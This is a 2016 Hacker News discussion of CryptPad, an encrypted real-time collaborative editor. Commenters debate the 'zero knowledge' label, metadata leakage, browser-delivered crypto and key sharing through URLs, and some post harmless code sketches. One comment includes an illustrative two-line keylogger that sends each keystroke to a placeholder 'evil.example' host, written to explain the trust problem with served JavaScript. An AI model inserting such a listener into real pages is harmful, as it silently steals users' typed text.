Cryptpad: Zero Knowledge, Collaborative Real Time Editing (cryptpad.fr)
137 points by zerognowl on Sept 23, 2016 | 52 comments



Why do people insist on using the term zero knowledge for simple semantically secure encryption?

Zero knowledge has a very specific meaning inside cryptography. Encrypting something does not make it "zero knowledge".


> Why do people insist on using the term zero knowledge for simple semantically secure encryption?

Note that in the domain of privacy-enhancing technologies the term "zero-knowledge" does not refer to "semantically secure encryption". Instead it is used to mean that a service provider does not have access to user data, and that this claim can be proven cryptographically. The use of the term zero-knowledge to promote privacy-respecting services dates back to at least 1997 with the founding of the Canadian company Zero-Knowledge Systems [1], which provided anonymous communication services [2].

[1] https://en.wikipedia.org/wiki/Zero_Knowledge_Systems [2] http://edition.cnn.com/TECH/computing/9902/11/browsanon.idg/


Note that in the field of cryptography, the term zero knowledge refers to zero knowledge proofs, which predate that company by over 13 years.


I don't dispute that fact. But there is precedent for the use of the term in privacy-respecting services, so we shouldn't be surprised when we encounter it. After ZKS shut down, the term continued to be used by hosting and communications services to explain their value proposition in a simple way.

Having said that, I agree with the point that nowadays this usage may be unhelpful in promoting privacy-respecting services because zero-knowledge proofs have come a long way and there are now services like Zerocash that actually make use of them. So using the term to promote a different privacy-respecting feature may be confusing or misleading.


I wish they would pick a clearer term that's not already in use, like (as I think they mean in this case) "provider-obscured". Heck, even "homomorphic" would be better, as that signifies "does stuff you want with your data, without knowing the content of said data".


Then that is a pretty poor precedent. However, I've not seen people (who actually understand cryptography or security) use "zero knowledge" to mean that the provider can't access your data.


Alternatively, based on my assumption that English is only a second language for the authors [1], I also think it might just be a cultural/language issue. Being a non-native English speaker myself, I frequently find my word usage differing from that of native speakers. And there is probably no formalized naming convention (like scientific names in biology); it's all in people's heads. What Fowler said about naming being hard is probably very true [2].

[1]: https://github.com/xwiki-labs/cryptpad/graphs/contributors [2]: http://martinfowler.com/bliki/TwoHardThings.html


I had the same feeling when reading the copy on the site. I looked for an explanation of what they mean by the statement, but couldn't find one. Google led me to a SpiderOak page that seems to use the terminology in a similar manner [1].

I have a hard time even accepting this definition of "zero knowledge" on its own, separate from the existing cryptographic one. Wouldn't the host at least know things like the size of the encrypted data? The time it was sent? Etc.

[1] https://spideroak.com/features/zero-knowledge


File size and date sent are probably only useful if someone is specifically targeting you, and it's virtually guaranteed that the only party who would target someone specifically and also be able to make use of that data is a government agency. In that case they'd be able to monitor your data at the ISP level anyway, making it moot. It doesn't look like SpiderOak takes bitcoin payments either, making this even further moot. Anyone serious about privacy against state actors wouldn't use it.


Metadata is often more useful than the message, and sometimes can expose the message. For example, a collaborative editor had better not send each key press to the other editors else timing attacks can reconstruct probable text fragments etc.
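
A minimal sketch of the usual mitigation (the names here, like encryptAndSend, are placeholders rather than any editor's real API): buffer local edits and only ship a combined patch on a fixed timer, so the channel carries coarse batches instead of per-keystroke timing.

  type Edit = { at: number; insert: string; remove: number };

  // Buffer keystrokes locally and flush one combined, encrypted patch per
  // tick, so an observer sees batch timing rather than individual key presses.
  class EditBatcher {
    private pending: Edit[] = [];

    constructor(
      private encryptAndSend: (batch: Edit[]) => void,
      flushEveryMs = 500,
    ) {
      setInterval(() => this.flush(), flushEveryMs);
    }

    push(edit: Edit): void {
      this.pending.push(edit); // nothing leaves the machine yet
    }

    private flush(): void {
      if (this.pending.length === 0) return;
      const batch = this.pending;
      this.pending = [];
      this.encryptAndSend(batch); // one ciphertext per tick, not per key press
    }
  }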


I don't agree that only government agencies would care. For example, anyone on open wifi can be easily targeted. So anyone doing something at a university could be targeted. I would imagine that some corporation would be interested in something from a university enough to try this.


Useful or not, I consider the boldface statement

> we know nothing about the encrypted data you store on our servers

misleading, since they do know some things about the encrypted data.
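
For example, with a secretbox-style authenticated cipher (this sketch uses tweetnacl-js, which may or may not match what these services actually run), the ciphertext is exactly the plaintext length plus a fixed overhead, so the size of what you store and when you store it remain visible to the host:

  import nacl from "tweetnacl";

  const key = nacl.randomBytes(nacl.secretbox.keyLength);     // 32-byte key
  const nonce = nacl.randomBytes(nacl.secretbox.nonceLength); // 24-byte nonce
  const plaintext = new TextEncoder().encode("meet at the usual place at 9");

  const ciphertext = nacl.secretbox(plaintext, nonce, key);

  // The host can't read the words, but the length survives encryption:
  console.log(ciphertext.length === plaintext.length + nacl.secretbox.overheadLength); // true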


I strongly support SpiderOak but I agree with you. Even if they don't keep logs of that stuff, they could, or could be ordered to do so. They obviously think the "ordered to do so" part is a real threat, because they dissuade users from logging in through the website.


I think this is a terminological suggestion from SpiderOak:

https://spideroak.com/features/zero-knowledge

It's true that it doesn't match the technical meaning of zero knowledge from cryptography (although maybe arguably the meaning of the technical term could be extended to this situation in a trivial way: rather than a proof or protocol involving Bob from which Bob doesn't learn certain information, this is a protocol not involving Bob from which Bob also doesn't learn certain information).


Counter argument: https://paragonie.com/blog/2016/08/crypto-misnomers-zero-kno...

Summary: zero-knowledge applies to authentication protocols, not encryption protocols.


I think I'm inclined to agree with that interpretation. I wish we had a clearer term for systems where you don't trust an intermediary with some kind of access. (We often say "end-to-end encrypted", but that's kind of weird for file storage or other data-at-rest situations.)


> I wish we had a clearer term for systems where you don't trust an intermediary with some kind of access.

We already have one or more of:

  - Confidential
  - End-to-end encrypted (contrasted with, but often in addition to,
    transport-layer encryption)
  - Privacy-preserving
  - Least authority (with respect to the service operator)
  - Peer-to-peer privacy

I'm one degree of separation from several SpiderOak engineers and think highly of them overall. However, this choice of marketing copy is one point we vehemently disagree on.


This is a fair question. I'm somewhat to blame for contributing to it over the last 10 years via SpiderOak. There are very good reasons though, and it's probably time I made a post about it.


> There are very good reasons though,

Okay, I'd really like to hear the argument about why muddying the waters about an already-hard-to-understand subject is totally fine.

> and it's probably time I made a post about it.

Please do.

A blog post that I linked elsewhere in this thread makes the case for why it's harmful.


I know this is just a proof-of-concept demo, but the "Code Pad" mode is built on CodeMirror and becomes unusably slow as soon as the document gets at all large (a few thousand lines), perhaps because they haven't implemented the range of tricks needed to transform CodeMirror's content efficiently, like the setValueNoJump extension here: https://github.com/sagemathinc/smc/blob/master/src/smc-webap...

DISCLAIMER: I've spent way too much time on synchronized CodeMirror editing...
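
For anyone curious what that kind of trick looks like, here's a deliberately naive sketch (the interfaces below are minimal stand-ins for the CodeMirror 5 API, not its real typings): replace only the changed slice of the document instead of calling setValue on the whole thing, which is roughly what setValueNoJump does, only far more carefully.

  // Minimal structural types for the bits of the CodeMirror 5 API touched here.
  interface Pos { line: number; ch: number }
  interface CMDoc {
    posFromIndex(index: number): Pos;
    replaceRange(text: string, from: Pos, to: Pos): void;
  }
  interface CMEditor {
    getValue(): string;
    getDoc(): CMDoc;
  }

  // Naive sketch: find the common prefix/suffix and replace only the middle,
  // instead of cm.setValue(newText), which rebuilds the whole document and
  // throws away cursor and scroll state.
  function setValueEfficiently(cm: CMEditor, newText: string): void {
    const oldText = cm.getValue();
    if (oldText === newText) return;

    // Common prefix
    let start = 0;
    while (start < oldText.length && start < newText.length &&
           oldText[start] === newText[start]) start++;

    // Common suffix (careful not to overlap the prefix)
    let endOld = oldText.length, endNew = newText.length;
    while (endOld > start && endNew > start &&
           oldText[endOld - 1] === newText[endNew - 1]) { endOld--; endNew--; }

    const doc = cm.getDoc();
    doc.replaceRange(newText.slice(start, endNew),
                     doc.posFromIndex(start), doc.posFromIndex(endOld));
  }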


Seeing as the key is only protected by TLS in the GET requests, you may want to tighten up your configuration. Also, patch the padding oracle vuln.

You scored an F on SSL Labs.

https://www.ssllabs.com/ssltest/analyze.html?d=beta.cryptpad...

I like the idea though! :)


Interesting idea.

I think it's kind of odd to draw such a strong comparison to the Bitcoin blockchain. As the technical description [1] points out, the "chainpad" system discards most of the features and properties that make Bitcoin secure against malicious participants. That seems like a totally reasonable design decision for this application, but then describing it as a blockchain just adds confusion.

In fact, the design seems to bear a much closer resemblance to the Bayou optimistic concurrency algorithm [2], with operational transformation as the underlying data model, and some extra crypto on top.

[1]: https://github.com/xwiki-contrib/chainpad

[2]: http://www.cs.utexas.edu/users/lorenzo/corsi/cs380d/papers/p...


Sharing the URL is essentially giving out the key, so there is no digitally safe way to do this unless you encrypt the initial message, at which point you are already using encrypted communication anyway and the URL just leaves open an attack vector. Please correct me if I am wrong.


Yes, you need an encrypted (or local) channel to share the Cryptpad URL but this can be achieved by using e.g. PGP or Signal or any other of the encrypted messengers out there. However, being able to send an encrypted message to someone is not the same as being able to collaboratively edit documents in real time (think "Google Docs") with that person.

This is where the value-added of Cryptpad lies: Yes, you need to already be able to exchange encrypted messages with your partner, but this will allow you to work on a document together in a secure[1] fashion.

For me, this is quite an achievement and not nothing.

[1]: "Secure" with all the caveats pointed out in the other comments below, e.g. if you do not self-host but use the cryptpad.fr server you need to trust them not to send malicious JavaScript to your browser.


I did not mean it was nothing; I was just seeing if I understood how it works and the risks. But I can see how a collaborative doc would be useful; this would be a good alternative to the option of communicating via draft messages in a shared Gmail account.


Just having encrypted communication doesn't enable collaborative document editing.

Seems to me the point is to use a secure channel to share the URL with your collaborators, and after that you can use a blockchain to host your collaborative edits instead of having to run a server.


This is a cool implementation of this idea.

Proof of work is probably an acceptable solution for a proof of concept, but anonymous consensus isn't needed for collaborative document editing.

I'm still thinking about whether this use case needs timestamping or atomic broadcast. If timestamping is sufficient, Google's new Roughtime protocol would do the job well. Otherwise you need a proper atomic broadcast algorithm like Raft, Tendermint, HoneyBadger, etc.

Great work.


There doesn't appear to be any mining, proof-of-work, anonymous consensus, or fault-tolerant consensus of any kind in this project. I think they just threw the phrase "Nakamoto blockchain" in there as inspiration; really they are just using hash chains from 1999.
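
For readers who haven't seen the distinction spelled out: a hash chain in this sense just means each entry commits to the hash of the one before it, so history can't be silently rewritten; no mining or consensus is involved. A toy sketch (not chainpad's actual wire format):

  import { createHash } from "crypto";

  // Toy hash chain: each entry carries the hash of its predecessor, so
  // reordering or rewriting history changes every later hash.
  interface Entry { prevHash: string; patch: string; hash: string }

  const GENESIS = "0".repeat(64);

  function append(chain: Entry[], patch: string): Entry[] {
    const prevHash = chain.length ? chain[chain.length - 1].hash : GENESIS;
    const hash = createHash("sha256").update(prevHash + patch).digest("hex");
    return [...chain, { prevHash, patch, hash }];
  }

  function verify(chain: Entry[]): boolean {
    return chain.every((e, i) => {
      const expectedPrev = i === 0 ? GENESIS : chain[i - 1].hash;
      const recomputed = createHash("sha256").update(e.prevHash + e.patch).digest("hex");
      return e.prevHash === expectedPrev && e.hash === recomputed;
    });
  }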


I would very much like to see someone build out the transcript validation application of atomic broadcast rather than a distributed ledger version.


That's disappointing :-(



I have often seen claims that doing any kind of crypto in (browser) javascript is dangerous. Does this fall into that trap?

How can I safely share the URL to someone without already using an established encrypted communication method?

Is the encryption key stored in my browser history?


The reason crypto in the browser is dangerous is that the crypto code comes from the server (it isn't built into the browser), so you would have to verify it every time you visit the site to know it's doing everything properly. They could easily change it to no-ops for you at the request of the NSA or whatever and you wouldn't know. On that basis, I don't think this project avoids the problem.


iOS silently installs updates to all apps from the App Store.

There is no meaningful distinction between JavaScript being served from the server and an app being served from the App Store.


I agree 100%. This means both processes are insecure, though it's probably a matter of degree, since you at least have the Apple approval process filtering out blatant fuckery.


Yes. Yes they do, and I agree – there is no meaningful distinction.

https://www.gnu.org/proprietary/proprietary-back-doors.en.ht...


yes.

you can't.

and yes.


While the ideas and implementation are neat, this suffers from the chicken-and-egg problem [1]. You have to trust that the server's resources are not tampered with. Adding an event binding to tamper with or siphon off data before it's encrypted is simple.

[1] https://www.nccgroup.trust/us/about-us/newsroom-and-events/b...
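
Purely as an illustration of how little it takes (the URL below is obviously a placeholder): a tampered bundle only needs a couple of lines like these to copy plaintext out of the page before any encryption happens.

  // Illustrative only: plaintext is read at the DOM level, before the page's
  // own crypto ever sees it.
  document.addEventListener("keydown", (e: KeyboardEvent) => {
    navigator.sendBeacon("https://evil.example/log", e.key);
  });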


I did something like this 3-4 years ago at secretdiary.com (or .org), which is now run by different people. The main difference is that the URL fragment had two parts:

http://secretdiary.org/#IDENTIFIER-AUTOGENPASSWORD

The autogenerated password was optional (and random); you could instead require a typed password. That way the secret was not cached anywhere with the URL unless you wanted it to be, so you could share the bare URL anywhere with no fear of it leaking the secret, or you could just share the whole thing, similarly to cryptpad.fr.

However, it was one of my first projects, so it didn't even have HTTPS.
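
In case it is useful, the "require a password instead" variant looks roughly like this (a sketch using WebCrypto PBKDF2; the parameters are illustrative, not what secretdiary actually used): the shared URL then carries only the identifier, and the key is derived client-side from whatever the user types.

  // Sketch: derive the document key from a typed password so the shared URL
  // (http://host/#IDENTIFIER) carries no secret at all.
  async function deriveKey(password: string, salt: Uint8Array): Promise<Uint8Array> {
    const material = await crypto.subtle.importKey(
      "raw", new TextEncoder().encode(password), "PBKDF2", false, ["deriveBits"]);
    const bits = await crypto.subtle.deriveBits(
      { name: "PBKDF2", salt, iterations: 100_000, hash: "SHA-256" },
      material, 256);
    return new Uint8Array(bits); // 32-byte symmetric key, never sent anywhere
  }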


Neat. Using chainpad as the basis of my next project :-)


This is pretty cool, but I believe that you still have to trust cryptpad.fr to send you javascript that won't leak.


From a glance at the GitHub page, it looks like you can self-host the project. Is "bower install" a possible attack vector as well? I'm unfamiliar with it.


Bower is a package manager for JavaScript libraries.

So the only attack vector would be a MITM attack intercepting the requests to the Bower registry.


Or a hijacked GitHub repository/maintainer?


Very good, thanks!


I'm looking forward to tptacek's commentary here given his position on in-browser crypto.


Isn't access exposed to whatever medium you use to transmit the URL?


I'd love something similar, but implemented as a browser extension.


Entering an invalid pad number redirects back to old.cryptpad.fr?


Ok, now this is cool.


why not just make it p2p via webrtc?


Seems cool.



